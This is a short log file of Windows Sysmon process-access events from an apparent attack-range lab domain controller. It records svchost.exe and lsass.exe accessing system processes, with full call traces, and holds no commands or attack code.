{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1204,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.363\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.363","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1205,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.364\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 908\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.364","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"908","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1206,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.364\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.364","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1207,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.364\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.364","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1208,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.364\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.364","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1209,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.364\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.364","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1210,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.364\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.364","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1211,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.364\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.364","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
